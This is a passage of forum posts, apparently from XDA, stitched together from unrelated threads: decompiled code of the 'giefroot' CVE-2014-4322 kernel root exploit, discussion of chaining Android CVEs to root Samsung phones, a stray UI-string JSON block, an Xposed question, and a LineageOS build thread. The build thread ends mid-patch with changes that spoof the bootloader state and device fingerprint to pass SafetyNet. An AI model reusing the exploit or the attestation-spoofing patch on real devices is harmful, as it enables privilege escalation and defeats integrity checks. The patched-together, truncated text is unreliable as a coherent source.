int v75; // [sp+4Ch] [bp-1B4h]@41
int v76; // [sp+50h] [bp-1B0h]@41
unsigned int v77; // [sp+54h] [bp-1ACh]@41
int v78; // [sp+58h] [bp-1A8h]@41
int v79; // [sp+5Ch] [bp-1A4h]@41
int v80; // [sp+60h] [bp-1A0h]@41
int v81; // [sp+64h] [bp-19Ch]@41
int v82; // [sp+68h] [bp-198h]@41
int v83; // [sp+6Ch] [bp-194h]@41
char v84; // [sp+70h] [bp-190h]@4
char v85[4]; // [sp+90h] [bp-170h]@29
int v86; // [sp+94h] [bp-16Ch]@29
int v87; // [sp+98h] [bp-168h]@29
char v88; // [sp+9Ch] [bp-164h]@29
int v89; // [sp+A0h] [bp-160h]@30
int v90; // [sp+A4h] [bp-15Ch]@30
int v91; // [sp+A8h] [bp-158h]@30
int v92; // [sp+ACh] [bp-154h]@30
int v93; // [sp+B0h] [bp-150h]@30
int v94; // [sp+B4h] [bp-14Ch]@30
int v95; // [sp+B8h] [bp-148h]@30
int v96; // [sp+BCh] [bp-144h]@30
int v97; // [sp+C0h] [bp-140h]@30
int v98; // [sp+C4h] [bp-13Ch]@30
int v99; // [sp+C8h] [bp-138h]@30
int v100; // [sp+CCh] [bp-134h]@30
char v101; // [sp+D4h] [bp-12Ch]@1
int v102; // [sp+1D4h] [bp-2Ch]@1
char v103; // [sp+1D8h] [bp-28h]@4
v2 = a1;
v102 = _stack_chk_guard;
v59 = a2;
puts("giefroot (c) zxz0O0");
v3 = fopen("/proc/version", "r");
fread(&v101, 0x100u, 1u, v3);
fclose(v3);
v4 = malloc(0x100u);
v5 = 30;
v6 = fopen("/system/build.prop", "r");
do
{
while ( 1 )
{
fgets((char *)v4, 256, v6);
v7 = strncmp((const char *)v4, "ro.product.device=", 0x12u);
v8 = v7;
if ( !v7 )
break;
--v5;
if ( !v5 )
goto LABEL_5;
}
strcpy(&v84, (const char *)v4 + 18);
--v5;
*(&v103 + strlen(&v84) - 361) = v8;
}
while ( v5 );
LABEL_5:
fclose(v6);
free(v4);
v9 = supported_kernel[0];
if ( supported_kernel[0] )
{
v10 = &unk_D014;
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
do
{
if ( !strcmp(v9, &v101) && (!v12 || !strcmp((const char *)*((int *)v10 - 4), &v84)) )
{
v12 = &supported_kernel[5 * v5];
unk_D0A4 = &supported_kernel[5 * v5];
}
v13 = *(const char **)v10;
v10 = (char *)v10 + 20;
v9 = v13;
++v5;
}
while ( v13 );
}
else
{
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
}
if ( v12 )
{
v12 = (char **)1;
}
else
{
puts("Error: Kernel not supported");
printf("Device: %s, Kernel: %s\n", &v84, &v101);
*(int *)v11 = supported_kernel;
}
if ( v2 > 1 && !strcmp(*(const char **)(v59 + 4), "-s") )
{
result = (unsigned int)v12 ^ 1;
goto error;
}
ion_fd = open("/dev/ion", 0);
if ( ion_fd < 0 )
puts("Error opening ion device");
v67 = 256;
v68 = 4;
v69 = 134217728;
v70 = 1;
sub_89F4();
v16 = ioctl(ion_fd, ION_IOC_ALLOC, &v67);
if ( v16 )
{
v25 = (int *)((int (*)(void))_errno)();
v26 = strerror(*v25);
printf("Error ioctl: %d / %s\n", v16, v26);
}
else
{
sub_89F4();
}
v62 = v71;
v17 = ioctl(ion_fd, ION_IOC_SHARE, &v62);
if ( v17 )
{
v18 = (int *)((int (*)(void))_errno)();
v19 = strerror(*v18);
printf("Error ioctl: %d / %s\n", v17, v19);
}
else
{
sub_89F4();
}
sub_89F4();
ion_void = (void *)mmap(0, 256, 7, 1);
memset(ion_void, 255, 0x100u);
memfile_fd = open("/data/local/tmp/memfile", 2);
if ( memfile_fd < 0 )
sub_89F4();
v20 = mmap(0, 2113929216, 7, 1);
if ( v20 == -1 )
puts("mmap shared_buf failed");
qseecom_fd = open("/dev/qseecom", 0);
if ( qseccom_fd < 0 )
{
puts("Error opening qseecom");
getting_root:
close(memfile_fd);
close(ion_fd);
close(qseccom_fd);
puts("getting root...");
ptmx_fd = open("/dev/ptmx", 0);
fsync(ptmx_fd, v53);
v54 = close(ptmx_fd);
v55 = getuid(v54);
v56 = printf("getuid: %d\n", v55);
if ( getuid(v56) )
{
puts("Error getting root");
result = 1;
}
else
{
system("/data/local/tmp/systemrw.sh");
system("/data/local/tmp/installsupersu.sh");
result = 0;
}
goto error;
}
sub_89F4();
*(int *)v85 = 1769437812;
v86 = 1769366884;
v87 = 25966;
memset(&v88, 0, 0x14u);
while ( 1 )
{
while ( 1 )
{
v93 = *(int *)v85;
v94 = v86;
v95 = v87;
v96 = *(int *)&v88;
v97 = v89;
v98 = v90;
v99 = v91;
v100 = v92;
v22 = ioctl(qseecom_fd, QSEECOM_IOCTL_APP_LOADED_QUERY_REQ, &v93);
if ( v22 )
{
v27 = (int *)_errno(v22, v23, v24);
strerror(*v27);
sub_89F4();
goto obtain_qseecom_mem;
}
sub_89F4();
puts("query failed. trying another app...");
if ( strcmp(v85, "tzwidevine") )
break;
strcpy(v85, "keymaster");
}
if ( strcmp(v85, "keymaster") )
break;
strcpy(v85, "tzsuntory");
}
if ( !strcmp(v85, "tzsuntory") )
{
puts("Error querying app");
goto getting_root;
}
obtain_qseecom_mem:
v64 = v63;
v65 = v20;
v66 = 2113929216;
v28 = ioctl(qseecom_fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &v64);
v31 = v28;
if ( v28 )
{
v57 = (int *)_errno(v28, v29, v30);
v58 = strerror(*v57);
printf("Error ioctl QSEECOM_IOCTL_SET_MEM_PARAM_REQ: %d / %s\n", v31, v58);
}
else
{
sub_89F4();
}
munmap(v20, 2113929216);
v32 = mmap(v20, 4096, 7, 50);
if ( v32 == -1 )
puts("Error allocating shared buf again");
memset((void *)v32, 255, 0x1000u);
v77 = 0;
v79 = 0;
v78 = 0;
v81 = 0;
v80 = 0;
v83 = 0;
v82 = 0;
v73 = 2113921024;
v74 = v32 + 80;
v75 = 4096;
v76 = v63;
v72 = v32;
puts("getting ptr");
v33 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v33 )
{
v36 = (int *)_errno(v33, v34, v35);
strerror(*v36);
sub_89F4();
}
else
{
sub_89F4();
}
munmap(v32, 4096);
sub_89F4();
v37 = mmap(v20, 524288, 7, 49);
if ( v37 != -1 )
{
sub_89F4();
memset((void *)v37, 255, 0x80000u);
v72 = v32 + ((unsigned int)(v37 + 979369984) >> 1);
v77 = (unsigned int)(v37 + 979369984) >> 1;
puts("getting offset");
v38 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v38 )
{
v41 = (int *)_errno(v38, v39, v40);
strerror(*v41);
sub_89F4();
}
else
{
sub_89F4();
}
v42 = sub_8A00(v37, 524288);
munmap(v37, 524288);
v43 = mmap(*(int *)ion_void, 1024, 7, 49);
if ( v43 == -1 )
{
puts("Error: Could not allocate memory for exploit code");
}
else
{
v44 = (void *)v43;
sub_89F4();
memcpy(v44, sub_8994, 0x400u);
munmap(ion_void, 4096);
v45 = (int)((char *)v44 + 64);
do
{
while ( 1 )
{
v46 = *(int *)v44;
v44 = (char *)v44 + 4;
if ( v46 == -1091584273 )
break;
if ( v44 == (void *)v45 )
goto exploit_qseecom;
}
*((int *)v44 - 1) = sub_89A4;
}
while ( v44 != (void *)v45 );
exploit_qseecom:
v47 = v32 + ((unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1);
v77 = (unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1;
v72 = v47;
puts("exploiting");
v48 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v48 )
{
v51 = (int *)_errno(v48, v49, v50);
strerror(*v51);
sub_89F4();
}
else
{
sub_89F4();
}
}
goto getting_root;
}
puts("Error allocating testmem");
result = 1;
error:
if ( v102 != _stack_chk_guard )
_stack_chk_fail(result);
return result;
}
I am tried to construct but sorry I am not skilled in reverse enginering. If you understand than try to construct right function from that and share it here!
Click to expand...
Click to collapse
Making CVE-2014-4322 a universal one would be quite challenging since it provides write-anywhere without read. It is almost impossible to avoid hard coded offsets. It would be great if there is another read and write anywhere flaw which requires system priv.
ZPaul2Fresh8 said:
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
Click to expand...
Click to collapse
Okay I decided to try to invoke the android terminal intent to open a new terminal window as a system user. it doesn't work for me but other people on preOTA may be able to get it to work. I disabled the factory reset crap so don't worry about accidently factory resetting your device (like I did to my tablet before I disabled them). You will need to install the android terminal emulator app from the play store prior to opening this app and clicking the button. if you get a terminal window open type whoami and post a screenshot please. If not a simple post saying it doesn't work is fine.
Sent from my SAMSUNG-SM-N910A using Tapatalk
This one looking good https://android.googlesource.com/pl...5d3e74ecc2b973941d8adbe40c6b23094b5abb7^!/#F0
You can decompile settings.apk and search in src/com/android/settings/accounts/AddAccountSettings.smali to see if it is patched or not.
Hey I know it's already been stated but I wanted to confirm for myself. Confirmed... The string "checkAndGetTcObjectClass" exists in system.img.ext4 from NI1 that i pulled off of sammobile.com http://www.sammobile.com/firmwares/download/38838/N910VVRU1ANI1_N910VVZW1ANI1_VZW.zip/. Screenshot below.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
Hi, I have implemented terminal emulator internaly into CVE-2014-8609.apk but from some unknown reasons it fail to start when I press "open terminal" button, I have spent 2 hours with this and I am lazy to debug more, sorry, try to decompile mine apk and fix it! Interesting thing I can start internal terminal emulator by command: "am start -n com.example.android.samplesync/jackpal.androidterm.Term", but clicking on button it no want to start
munjeni said:
I don't know, I stil receiving sms, only unable to get terminal emulator on button click
Click to expand...
Click to collapse
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to withing the app so that once it's intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
stvn1337 said:
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to withing the app so that once it's intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
Click to expand...
Click to collapse
Yes strange, when I click on "open terminal" it open settings, another clicks doing nothing until I kill app and lunch again, strange. Maybe we need to look into terminal emulator for this? I have no time now, but you can try to open another app?
It open com.google.android.c2dm.intent sucesfully but no terminal emulator, I don't know why.
munjeni said:
Yes strange, when I click on "open terminal" it open settings, another clicks doing nothing until I kill app and lunch again, strange. Maybe we need to look into terminal emulator for this? I have no time now, but you can try to open another app?
It open com.google.android.c2dm.intent sucesfully but no terminal emulator, I don't know why.
Click to expand...
Click to collapse
Your correct, I wonder if terminal emulator has been patched to prevent the broadAnywhere bug from launching it? If so then we need to find another terminal emulator that allows broadAnywhere to launch it with intents. Unless someone has time to search the terminal emulators source to figure out how it's been patched to prevent it..
Sent from my SAMSUNG-SM-N910A using Tapatalk
Maxninja said:
I did some research and googled the CVE-2014-4322 exploit and I stumbled on a forum for the Sony Xperia for them to achieve root with that exploit - http://forum.xda-developers.com/showthread.php?t=3011598
I don't know if it's useful but I hope it will help somewhere in the process for our phone to be rooted with the same exploit.
Click to expand...
Click to collapse
Yeah that was covered 50+ pages ago. That's the kernel side of it, we know that will work but first we have to get through the Android side first. That's what 1474 should do for us.
@soupmeister Yes. This is the best place.
windstrings said:
This brings the next question.. An educated guess as to whether this will work with lollipop?
Click to expand...
Click to collapse
I would be curious about this also, but only after root is out for pre-Lollipop. The description says through 5.0, which sounds to me like 5.0 is vulnerable but who knows if 5.0.1 or 5.0.2 is. Also Samsung, as we've seen recently with the root that works on other phones using those two CVEs not working on our phones, will backport fixes. I don't know how much Samsung is still tweaking their Lollipop update, but since this seems like a small fix, my money would be on it being fixed in the Samsung Lollipop update.
Btw I've been trying to upload the contents of system.img.ext4 from the AT&T and Verizon tar md5 files to Google Drive for easy reference but it keeps timing out and I don't want to post something missing random files. I'll try with a specialized uploader tool later.
Also CVE-2015-1474 was updated on the 17th to say that it's network exploitable(!) and I guess they gave it a 10.0 score, the highest! This seems to be more serious than that last "worst android bug ever" recently used for root in the last year.
I sure hope whatever tool that gives root that comes out also applies a fix for this. I wouldn't want to walk around with it if I could help it.
So after a bunch of useless posts basically asking to confirm this or thanking that..at least we can count on qcom to brighten our day...
https://www.codeaurora.org/projects...le-camera-drivers-cve-2014-4321-cve-2014-4324
Qcom camera FTW
Just a little further reading for some:
http://www.cvedetails.com/cve/CVE-2015-1474/
jcase said:
Would still require 1 or 2 additional vulns to exploit. Not so easy to get camera group in modern Android
Click to expand...
Click to collapse
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true than someone much smarter than me should have a lot to fool around with.
jasonstackhouse said:
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true than someone much smarter than me should have a lot to fool around with.
Click to expand...
Click to collapse
Ok I will. These "permission groups" from the play store have nothing to do with this. We are talking about a single android permission (android.permission.CAMERA) and a single linux group ("camera').
In 5.0, and many 4.x devices (i dont think it was all, it might have been all, i just dont care to find my notes, 10hr trip to take son to Dr and back, just got home and freaking tired) the linux group "camera" used in android was severed from the camera permission, declaring this permission does not put your user (app) into the camera group.
Simple test,
adb shell grep -A 10 -B 10 camera /system/etc/permissions/platform.xml
On blackphone (4.4.x), HTC Desire 510 (4.4.x) MotoX 2014 (5.0.x), the above command returned nothing.
One older devices, say 4.2.2 you would get teh following as the output:
<permission name="android.permission.CAMERA" >
<group gid="camera" />
</permission>
This means apps that are granded the permission, are put into the group "camera".
See:
https://android.googlesource.com/platform/frameworks/base/+/android-4.2.2_r1/data/etc/platform.xml
vs
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.2_r1/data/etc/platform.xml
What does this mean? You cant directly talk to what you need to to exploit those camera vulns, you would need to exploit mediaserver, or escalate to system first (Which means squat, if you are system you have 100 ways to root that are easier than these camera bugs). Also must not forget about SEAndroid, might put a snag into it as well, but like ive said I just saw these today, and have been home for a whole 10minutes so far today.
Misterxtc said:
If it helps any this is what the adb command returned on the VZW Note4 on NJ5.
View attachment 3172812
Click to expand...
Click to collapse
Same here, AT&T NIE
C:\Users\rac1\Desktop\ADB>adb shell grep -A 10 -B 10 camera /system/etc/permissi
ons/platform.xml
<permission name="android.permission.SYSTEM_GROUP_INTERNAL" >
<group gid="system" />
</permission>
<permission name="android.permission.INTERNET" >
<group gid="inet" />
</permission>
<permission name="com.sec.android.permission.CAMERA" >
<group gid="camera" />
</permission>
<permission name="android.permission.READ_LOGS" >
<group gid="log" />
</permission>
<permission name="android.permission.READ_EXTERNAL_STORAGE" >
<group gid="sdcard_r" />
</permission>
--
<group gid="graphics" />
</permission>
<!-- Except for SysScope, DO NOT USE this permission. -->
<permission name="com.sec.android.app.sysscope.permission.ACCESS_SYSTEM_INFO
_SYSSCOPE_ONLY" >
<group gid="radio" />
</permission>
<!-- Group that can use gscaler -->
<permission name="com.sec.android.permission.USE_CAMERA" >
<group gid="camera" />
</permission>
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- The following tags are assigning high-level permissions to specific
user IDs. These are used to allow specific core system users to
perform the given operations with the higher-level framework. For
example, we give a wide variety of permissions to the shell user
OK let's not forget about cve-2015-1474. This is the vulnerability that's going to get us what we want. Let's not get sidetracked about another vulnerability that we may not even need.
I'm trying to read the list of active Xposed modules at "/data/data/de.robv.android.xposed.installer/conf/modules.list"
Currently, I'm using
Code:
String line;
process = new ProcessBuilder("su", "-c", "cat", MODULES_LIST_FILE).start();
BufferedReader in = new BufferedReader(new InputStreamReader(process.getInputStream()));
while ((line = in.readLine()) != null) {
modules.add(line);
}
in.close();
- which does work, I'd just prefer to not require root access.
Where could I possibly hook to give me access to this file?
Thanks!
arilotter said:
I'm trying to read the list of active Xposed modules at "/data/data/de.robv.android.xposed.installer/conf/modules.list"
Currently, I'm using
Code:
String line;
process = new ProcessBuilder("su", "-c", "cat", MODULES_LIST_FILE).start();
BufferedReader in = new BufferedReader(new InputStreamReader(process.getInputStream()));
while ((line = in.readLine()) != null) {
modules.add(line);
}
in.close();
- which does work, I'd just prefer to not require root access.
Where could I possibly hook to give me access to this file?
Thanks!
Click to expand...
Click to collapse
I believe that the "android" package has access to all data. So you could hook handleLoadPackage, wait for the "android" package to load, then try reading your file. Not sure if it'd work or not, though. You wouldn't have to hook any specific method.
[/COLOR @razorloves I compiled my own unofficial LineageOS 17.0 for Marlin from your sources, but I don't have gapps compiled in. Is it possible to install gapps over the Lineage zip file? When I tried, it said that it thought I had Android 9, and it needed Android 10, so it wouldn't install.
ocarinaz64 said:
I compiled my own unofficial LineageOS 17.0 for Marlin from your sources, but I don't have gapps compiled in. Is it possible to install gapps over the Lineage zip file? When I tried, it said that it thought I had Android 9, and it needed Android 10, so it wouldn't install.
Click to expand...
Click to collapse
I have tried the same too... Android 10 appears to lock out the ability to mount /system as rw in recovery from my understanding.
I have had no luck compiling LOS 17 with opengapps at all.
GT3CH1 said:
I have tried the same too... Android 10 appears to lock out the ability to mount /system as rw in recovery from my understanding.
I have had no luck compiling LOS 17 with opengapps at all.
Click to expand...
Click to collapse
I was able to easily delete some of the safety checks on the gapps install script. It ran the installation .zip, but nothing appeared differently when I booted into the ROM. I got the same result with every gapps package I have found so far. So far the only way I can get gapps then is this ROM where it's already built into it.
ocarinaz64 said:
I was able to easily delete some of the safety checks on the gapps install script. It ran the installation .zip, but nothing appeared differently when I booted into the ROM. I got the same result with every gapps package I have found so far. So far the only way I can get gapps then is this ROM where it's already built into it.
Click to expand...
Click to collapse
I was able to extract all of the opengapps files from one of their installers and attempt to push it to LOS17... I ended up with a continuous bootloop because of a priv-app permissions issue... which was weird because I added the permissions to the right files, but it still erred out.
If anyone has any bright ideas, I would love to contribute some of my server space to set up nightly builds of LOS17 (stock LOS17 works just fine), but I want see if there is a good way to add in gapps to the build first.
GT3CH1 said:
I was able to extract all of the opengapps files from one of their installers and attempt to push it to LOS17... I ended up with a continuous bootloop because of a priv-app permissions issue... which was weird because I added the permissions to the right files, but it still erred out.
If anyone has any bright ideas, I would love to contribute some of my server space to set up nightly builds of LOS17 (stock LOS17 works just fine), but I want see if there is a good way to add in gapps to the build first.
Click to expand...
Click to collapse
I've been trying to build with open gapps integrated into the rom as well. I managed to get it to build without errors (which is a bit tricky at the moment as the current state of the branches is breaking the build), but I got boot loops that I haven't been able to diagnose.
This is using the instructions here
https://github.com/opengapps/aosp_build/blob/master/README.md
But would be ideal if razorloves could give us the relevant details on how to do build with mindthegapps.
For your issue on permissions, have you set the selinux contexts?
NZedPred said:
I've been trying to build with open gapps integrated into the rom as well. I managed to get it to build without errors (which is a bit tricky at the moment as the current state of the branches is breaking the build), but I got boot loops that I haven't been able to diagnose.
This is using the instructions here
https://github.com/opengapps/aosp_build/blob/master/README.md
But would be ideal if razorloves could give us the relevant details on how to do build with mindthegapps.
For your issue on permissions, have you set the selinux contexts?
Click to expand...
Click to collapse
I haven't been able to mess with selinux yet... I'm waiting for a break so that I can sit and mess with my phone again.
I second the idea of getting the details to build with MTG. I did what the aosp build instructions said for opengapps. It acted like it pulled the repo down, but it isn't copying the APK's over to the final zip install. Maybe I am missing something.
GT3CH1 said:
I haven't been able to mess with selinux yet... I'm waiting for a break so that I can sit and mess with my phone again.
I second the idea of getting the details to build with MTG. I did what the aosp build instructions said for opengapps. It acted like it pulled the repo down, but it isn't copying the APK's over to the final zip install. Maybe I am missing something.
Click to expand...
Click to collapse
For the apk issue, you need to make sure you have git lfs installed, and for each of the folders in vendor/opengapps/sources/ do a git lfs pull.
I made that mistake as well... Repo doesn't appear to apply the git lfs pull on its own. The files that you have are just text files with URLs to the files.
NZedPred said:
For the apk issue, you need to make sure you have git lfs installed, and for each of the folders in vendor/opengapps/sources/ do a git lfs pull.
I made that mistake as well... Repo doesn't appear to apply the git lfs pull on its own. The files that you have are just text files with URLs to the files.
Click to expand...
Click to collapse
I did that too.... Something else is going on with my system then. I did a git lfs pull on each directory, and it looked like it pulled down the apps - the file sizes changed... I might just wipe my current opengapps directory, allocate a little more disk space, and re do that pull.
I am trying to build with MTG at the moment, despite the super vague readme.
GT3CH1 said:
I did that too.... Something else is going on with my system then. I did a git lfs pull on each directory, and it looked like it pulled down the apps - the file sizes changed... I might just wipe my current opengapps directory, allocate a little more disk space, and re do that pull.
I am trying to build with MTG at the moment, despite the super vague readme.
Click to expand...
Click to collapse
I just re-read what you said about the final zip install, sorry i mis-read that. Did you create a file device/google/sailfish/device.mk and put the lines in? If so, they actually need to go into device/google/marlin/device-sailfish.mk. I did that mistake, and it didn't put anything into the final zip. You will get some other build errors that you have to work around after don't that change though... (Yes it's frustrating).
In any case, thanks for the link to the MTG readme. I'll have a go when I'm at home and see if I have any luck...
NZedPred said:
I just re-read what you said about the final zip install, sorry i mis-read that. Did you create a file device/google/sailfish/device.mk and put the lines in? If so, they actually need to go into device/google/marlin/device-sailfish.mk. I did that mistake, and it didn't put anything into the final zip. You will get some other build errors that you have to work around after don't that change though... (Yes it's frustrating).
In any case, thanks for the link to the MTG readme. I'll have a go when I'm at home and see if I have any luck...
Click to expand...
Click to collapse
No worries. Even though i've got a marlin does it go under device-marlin.mk? That wouldn't make any sense...
For MTG I added this to my .repo/manifests/default.xml
Code:
<remote name="mtg" fetch="https://gitlab.com/MindTheGapps/" />
<project path="vendor/gapps" name="vendor_gapps" revision="qoppa" remote="mtg" />
And it is acting like it is syncing properly. Step 2 has got me a little bit confused... I am going to assume that it is similar to opengapps
Code:
$(call inherit-product, vendor/opengapps/build/opengapps-packages.mk)
line for device-marlin.mk, but just modified for MTG.
It'd be cool if this works. I'd love to have my own build of LOS working.
---------- Post added at 02:48 AM ---------- Previous post was at 01:51 AM ----------
NZedPred said:
I just re-read what you said about the final zip install, sorry i mis-read that. Did you create a file device/google/sailfish/device.mk and put the lines in? If so, they actually need to go into device/google/marlin/device-sailfish.mk. I did that mistake, and it didn't put anything into the final zip. You will get some other build errors that you have to work around after don't that change though... (Yes it's frustrating).
In any case, thanks for the link to the MTG readme. I'll have a go when I'm at home and see if I have any luck...
Click to expand...
Click to collapse
Ok, I was able to get gapps to *almost* work - log shows that it is copying the files and all the fun stuff... however...
Code:
'linux/msm_ion.h' file not found
is appearing from
Code:
file included from device/google/marlin/camera/QCamera2/stack/mm-camera-test/src/mm_qcamera_reprocess.c:31:
02:42:21 device/google/marlin/camera/QCamera2/stack/mm-camera-test/inc/mm_qcamera_app.h
I'm gonna clean the build dir... see if that works.
GT3CH1 said:
No worries. Even though i've got a marlin does it go under device-marlin.mk? That wouldn't make any sense...
For MTG I added this to my .repo/manifests/default.xml
Code:
<remote name="mtg" fetch="https://gitlab.com/MindTheGapps/" />
<project path="vendor/gapps" name="vendor_gapps" revision="qoppa" remote="mtg" />
And it is acting like it is syncing properly. Step 2 has got me a little bit confused... I am going to assume that it is similar to opengapps
Code:
$(call inherit-product, vendor/opengapps/build/opengapps-packages.mk)
line for device-marlin.mk, but just modified for MTG.
It'd be cool if this works. I'd love to have my own build of LOS working.
---------- Post added at 02:48 AM ---------- Previous post was at 01:51 AM ----------
Ok, I was able to get gapps to *almost* work - log shows that it is copying the files and all the fun stuff... however...
Code:
'linux/msm_ion.h' file not found
is appearing from
Code:
file included from device/google/marlin/camera/QCamera2/stack/mm-camera-test/src/mm_qcamera_reprocess.c:31:
02:42:21 device/google/marlin/camera/QCamera2/stack/mm-camera-test/inc/mm_qcamera_app.h
I'm gonna clean the build dir... see if that works.
Click to expand...
Click to collapse
I've done the same change to the manifest. I would suggest though once you get it up and running, that you don't make the change directly to the default manifest, but rather put it into e.g. .repo/local_manifests/mindthegapps.xml. That way it won't get overwritten if the default manifest gets updated.
I had a build just complete with that change, but as it was practically built anyway, I'm trying from a clean build directory just to make sure it definitely builds! The only change in my case for sailfish is adding the line
Code:
$(call inherit-product, vendor/gapps/arm64/arm64-vendor.mk)
near the bottom of device/google/marlin/device-sailfish.mk. You'd do the same in the device/google/marlin/device-marlin.mk file.
If the build compiles successfully then I'll probably put together a start-to-finish guide on how to do this. I also want to do a "user" build that is signed, and see if it's possible to pass safety net without requiring magisk. But for now, my fingers are crossed that I just get a basic build done!
NZedPred said:
I've done the same change to the manifest. I would suggest though once you get it up and running, that you don't make the change directly to the default manifest, but rather put it into e.g. .repo/local_manifests/mindthegapps.xml. That way it won't get overwritten if the default manifest gets updated.
I had a build just complete with that change, but as it was practically built anyway, I'm trying from a clean build directory just to make sure it definitely builds! The only change in my case for sailfish is adding the line
Code:
$(call inherit-product, vendor/gapps/arm64/arm64-vendor.mk)
near the bottom of device/google/marlin/device-sailfish.mk. You'd do the same in the device/google/marlin/device-marlin.mk file.
If the build compiles successfully then I'll probably put together a start-to-finish guide on how to do this. I also want to do a "user" build that is signed, and see if it's possible to pass safety net without requiring magisk. But for now, my fingers are crossed that I just get a basic build done!
Click to expand...
Click to collapse
Been building for a couple weeks using razorloves' gapps then swtiched to shagbag913's gapps. Added the call inherit-product code to device/google/marlin/sailfish/device-lineage.mk but your way should work.
Everything has been working fine except for Android Auto which I think is a bigger GApps issue.
Can someone explain how to either properly install a pre-built gapps package for Android 10 and / or explain how to properly build gapps packages into a ROM (if such action is even legal)?
I followed the instructions from https://github.com/opengapps/aosp_build/blob/master/README.md and ended up getting build errors that I couldn't push through.
@razorloves, I would love your input since you have already accomplished this.
Hi,
I have written up a quick documentation on how to do this with MTG and my Google apps package.
Please take a look at it here.
My Google apps package(gavapps) may/may not work for your device, I have specifically fine-tuned it to work for a Google Pixel XL.
HOWEVER,
If you follow the instructions for the Mind The GApps, you will be able to compile a version of Android 10 with the Google play store.
For those who care, I was able to compile the most recent of LOS17 for Google Pixel XL with a couple of gapps pre-built.
Link is here
user build with release keys
I mentioned before I was going to attempt to do a build that would pass safety net without needing to install Magisk and use hiding modules. I haven't quite managed that, but thought I'd post details of the progress that I've made.
Note for the below, I have a Pixel, so my codename is always sailfish - replace with marlin for the Pixel XL. Also, follow the instructions above to include MindTheGapps (you need the Google services to do the SafetyNet check).
Now, importantly I found that the Eleven app didn't compile under a user build (it's fine in a userdebug build). If you find the same issue, best to remove it from the project by adding this to a local manifest, e.g. .repo/local_manifest/excluded-projects.xml
Code:
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<!-- Does not compile in a user build -->
<remove-project name="LineageOS/android_packages_apps_Eleven" />
</manifest>
Follow instructions in this link to set up some build keys:
https://wiki.lineageos.org/signing_builds.html (the section Generating the keys). For convenience, the commands are pasted below (customize the subject):
Code:
subject='/C=US/ST=California/L=Mountain View/O=Android/OU=Android/CN=Android/[email protected]'
mkdir ~/.android-certs
for x in releasekey platform shared media testkey; do \
./development/tools/make_key ~/.android-certs/$x "$subject"; \
done
Now for building, do a 'repo sync' and 'source build/envsetup.sh' as you normally would, but now it's time to apply a few patches.
Kernel command line patch:
https://gist.github.com/kirelagin/211af699bd321f9448d310502074bd9c
Or get the raw version of the patch directly here:
https://gist.githubusercontent.com/...e45f468cbefc3a9c571bd3d8b2a877/safetynet.diff
This patch needs to be applied to the kernel/google/marlin folder. Its purpose is to change a few flags in the command line to remove the fact that the bootloader is unlocked, etc.
Code:
cd kernel/google/marlin
git apply safetynet.diff
The below is not required now, a recent patch fixed this issue
Now normally, as the build files replace the device fingerprint with the fingerprint from stock, we would expect that doing e.g. in a shell in the rom "getprop | grep fingerprint" would return said fingerprint in all cases. However, I always found that one, 'ro.build.fingerprint' would always be the default Lineage build fingerprint. I couldn't find how to get that one in particular to be the same as the others, so I ended up doing something that isn't portable but works
Patch system/code/base/properties.cpp by applying one of the following patches (you must be within the system/code folder)
Sailfish:
Code:
diff --git a/base/properties.cpp b/base/properties.cpp
index d5a5918ce..49959ffad 100644
--- a/base/properties.cpp
+++ b/base/properties.cpp
@@ -79,6 +79,10 @@ static int __system_property_set(const char* key, const char* value) {
std::string GetProperty(const std::string& key, const std::string& default_value) {
std::string property_value;
+ if (key == "ro.build.fingerprint") {
+ property_value = "google/sailfish/sailfish:10/QP1A.191005.007.A1/5908163:user/release-keys";
+ return property_value;
+ }
#if defined(__BIONIC__)
